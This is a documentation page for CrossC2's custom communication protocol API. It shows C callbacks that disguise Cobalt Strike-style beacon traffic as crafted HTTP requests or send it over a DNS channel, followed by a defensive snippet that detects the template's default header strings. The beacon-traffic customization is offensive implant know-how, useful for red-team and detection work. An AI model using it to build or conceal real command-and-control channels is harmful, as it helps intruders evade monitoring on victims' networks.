Custom communication protocol

CrossC2 exposes a communication protocol API. Implementing it lets a beacon follow C2Profile settings or use a custom protocol.

Instructions

After writing the communication protocol implementation, compile it into a dynamic library with `gcc/clang test.c -fPIC -shared -o lib_rebind_test.so`. When generating a beacon, set the `rebind_dynamic_lib` option in the cna script or in genCrossC2 to the library just built (`lib_rebind_test.so`). The generated beacon then sends its communication packets according to the protocol implementation in that library.

HTTPs communication template modification

These callbacks correspond to the 4 setting options in the C2Profile:

http-get { 
    client(send) { metadata{} }
    server(recv) { output{} }
}
http-post { 
    client(send) { 
        id {} 
        output {} 
    }
    server(recv) { output{} }
}

void (*cc2_rebind_http_get_send)(char *reqData, char **outputData, long long *outputData_len);
void (*cc2_rebind_http_get_recv)(char *resData, long long resData_len, char **outputData, long long *outputData_len);
void (*cc2_rebind_http_post_send)(char *reqData, char *beaconID, char **outputData, long long *outputData_len);
void (*cc2_rebind_http_post_recv)(char *resData, long long resData_len, char **outputData, long long *outputData_len);

cc2_rebind_http_x_send series of functions:
    Wrap the incoming base64(metadata) data and return the complete HTTP message to send.
    `*reqData` is the base64-encoded data to be requested (the metadata field) - C2Profile http-get { client { (metadata) } }
    `**outputData` returns the actual HTTP content that needs to be sent

cc2_rebind_http_x_recv series of functions:
    Parse the incoming HTTP message and return the base64(output) data.
    `*resData` is the complete HTTP content returned by the server
    `**outputData` returns the actual content carried in the HTTP message (the base64-encoded output field) - C2Profile http-get { server { (output) } }

Communication protocol customization

void (*cc2_rebind_get_protocol)(char *reqData, char **outputData, long long *outputData_len);
void (*cc2_rebind_post_protocol)(char *reqData, char *beaconID, char **outputData, long long *outputData_len);

cc2_rebind_x_protocol series of functions:
    Send the incoming raw data over the custom channel, receive the reply, and return the resulting base64(output) data.
    `*reqData` is the base64-encoded data to be requested (metadata field / id + output field)
    `**outputData` is the base64-encoded server response data (output field)

Examples:

HTTPs communication template customization:


#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void cc2_rebind_http_get_send(char *reqData, char **outputData, long long *outputData_len) {
    printf("------ custom http get send ------\n");
    const char *requestTemplate = "GET /%s HTTP/1.1\r\n"
        "Host: http.cc2.com\r\n"
        "Accept: gzip, deflate\r\n"
        "User-Agent: cc2_rebind_http_get_send\r\n"
        "Cookie: %s\r\n"
        "Connection: cc2_rebind_http_get_send\r\n\r\n";

    // Size the buffer from the formatted length instead of using a fixed
    // array, so that a long reqData cannot overflow it
    int len = snprintf(NULL, 0, requestTemplate, "test", reqData);
    if (len < 0) return;

    // Write the generated HTTP data to outputData
    *outputData = (char *)calloc(1, (size_t)len + 1);
    if (*outputData == NULL) return;
    snprintf(*outputData, (size_t)len + 1, requestTemplate, "test", reqData);
    *outputData_len = len;

    printf("-------------------------\n");
}

void cc2_rebind_http_get_recv(char *rawData, long long rawData_len, char **outputData, long long *outputData_len) {
    printf("------ custom http get recv ------\n");

    // rawData = "HTTP/1.1 200 OK
    // Date: Tue, 26 May 2020 10:12:28 GMT
    // Server: CC2_server
    // Content-Length: 32
    // Connection: close
    // Content-Type: text/html; charset=iso-8859-1
    //
    // XXXXZZZZXXXXAAAZZ==

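    // find_pay is a helper that is not shown on this page; for the response
    // above it returns a pointer to the body, "XXXXZZZZXXXXAAAZZ=="
    char *payload = find_pay(rawData, rawData_len);
    if (payload == NULL) return;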

    *outputData_len = strlen(payload);
    *outputData = (char *)calloc(1,  *outputData_len);
    memcpy(*outputData, payload, *outputData_len);

    printf("-------------------------\n");
}
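
Seen from the monitoring side, an unmodified copy of the template above sends its placeholder strings in the `User-Agent` and `Connection` headers, and the sample response carries `Server: CC2_server`. The check below is an added example, not CrossC2 code: `cc2_template_hits`, the flag names and both sample requests (including the placeholder Cookie value) are constructed here, and it goes slightly beyond the literal strings by flagging any `Connection` token that is neither a standard option nor the name of a header present in the message. A custom library can change every one of these strings, so a zero result only rules out the template defaults.

```c
#include <string.h>
#include <strings.h>

enum { HIT_USER_AGENT = 1, HIT_CONNECTION = 2, HIT_SERVER = 4 };

/* Constructed samples: the request the page's GET template produces (the
 * Cookie value is a placeholder) and an ordinary client request. */
const char TEMPLATE_REQ[] = "GET /test HTTP/1.1\r\nHost: http.cc2.com\r\n"
    "Accept: gzip, deflate\r\nUser-Agent: cc2_rebind_http_get_send\r\n"
    "Cookie: QUJDRA==\r\nConnection: cc2_rebind_http_get_send\r\n\r\n";
const char BENIGN_REQ[] = "GET / HTTP/1.1\r\nHost: example.org\r\n"
    "User-Agent: curl/8.5.0\r\nConnection: keep-alive, TE\r\nTE: trailers\r\n\r\n";

/* Copy header `name` from a raw HTTP message into out; returns 1 if present. */
static int header_value(const char *msg, const char *name, char *out, size_t cap) {
    size_t nlen = strlen(name);
    const char *line = strstr(msg, "\r\n");               /* end of start line */
    while (line && strncmp(line, "\r\n\r\n", 4) != 0) {   /* blank line: body */
        line += 2;
        const char *end = strstr(line, "\r\n");
        if (!end) end = line + strlen(line);
        if (strncasecmp(line, name, nlen) == 0 && line[nlen] == ':') {
            const char *v = line + nlen + 1;
            while (v < end && (*v == ' ' || *v == '\t')) v++;
            size_t n = (size_t)(end - v) < cap - 1 ? (size_t)(end - v) : cap - 1;
            memcpy(out, v, n);
            out[n] = '\0';
            return 1;
        }
        line = strstr(line, "\r\n");
    }
    return 0;
}

/* Bitmask of the page's template defaults seen in one HTTP message. */
int cc2_template_hits(const char *msg) {
    char v[256], tmp[8];
    int hits = 0;
    if (header_value(msg, "User-Agent", v, sizeof v) && !strncmp(v, "cc2_rebind_", 11))
        hits |= HIT_USER_AGENT;
    if (header_value(msg, "Server", v, sizeof v) && !strcmp(v, "CC2_server"))
        hits |= HIT_SERVER;
    if (header_value(msg, "Connection", v, sizeof v))
        for (char *t = strtok(v, ", \t"); t; t = strtok(NULL, ", \t"))
            /* expected: a standard option, or the name of a header present */
            if (strcasecmp(t, "close") && strcasecmp(t, "keep-alive") &&
                strcasecmp(t, "upgrade") && !header_value(msg, t, tmp, sizeof tmp))
                hits |= HIT_CONNECTION;
    return hits;
}
```

Only the header section is inspected; text after the blank line is treated as body and ignored.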

Communication protocol customization:

void cc2_rebind_get_protocol(char *reqData, char **outputData, long long *outputData_len) {
    printf("------ custom get protocol ------\n");
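    // sendDNS is a helper that is not shown on this page
    sendDNS("127.0.0.1", 53, 1, reqData, strlen(reqData), outputData, outputData_len);
    if (*outputData_len > 0) {
        // outputData_len is a long long, so it is printed with %lld
        printf("cobaltstrike cc2_server response(%lld): \n", *outputData_len);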
    }
    printf("------ custom protocol ------\n");
}
